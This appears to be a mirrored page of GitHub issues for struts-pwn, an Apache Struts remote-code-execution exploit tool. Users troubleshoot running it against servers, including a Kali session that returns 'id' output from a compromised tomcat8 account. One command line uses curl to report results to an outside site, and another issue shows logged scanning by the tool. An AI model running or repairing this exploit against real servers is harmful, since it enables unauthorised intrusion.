Code Monkey home page Code Monkey logo

struts-pwn's Issues

passing url to the command var

Hey dude,

When doing a list any way to provide the url as a var in the command so you can log against which sites are vun?

python struts-pwn.py --list 'urls.txt' -c 'curl -L https://mysite.com/test.php?url='

Issue with requests partial read

Urls have been obfuscated. On a vulnerable struts server, using the default struts-pwn, an IncompleteRead is returned with 0 bytes

root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: xxxx/test.action
[*] CMD: id
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
ERROR
[%] Done.

If this is swapped to be urllib2 however, a partial response is received:

    try:
        #rq = requests.get(url, headers=headers, timeout=timeout, allow_redirects=False) 
        #output = rq.text
        request = urllib2.Request(url, headers=headers)
        request = urllib2.urlopen(request).read()
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        print e.partial
        output = 'ERROR'
    return(output)
root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: http://xxxx/test.action
[*] CMD: id
EXCEPTION::::--> IncompleteRead(54 bytes read)
uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

ERROR
[%] Done.

I've yet to identify what behind the scenes is causing this error. Urllib3 appears to have the same behaviour as urllib2 (although I can't work out how to decode the response). Any idea if the way requests is working is causing issues?

ssl problem

the exploit code failed against https websites

error 104 - Connection reset by peer

Strangely enough, if I run the python script with --check, I get a response 200 and it shows my site as vulnerable.

If I try to run the exploit, then I get an Exception:
EXCEPTION::::--> ('Connection aborted.', error(104, 'Connection reset by peer'))

Any ideas what I can do to debug where/why the exception is being generated with the exploitable content-type?

Script Kiddies in log

Seeing this in my logs from a Script Kiddie.

80.15.195.28 - - [30/Apr/2017:10:34:21 +0000] "GET / HTTP/1.1" 200 0 "-" "struts-pwn (https://github.com/mazen160/struts-pwn)"

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.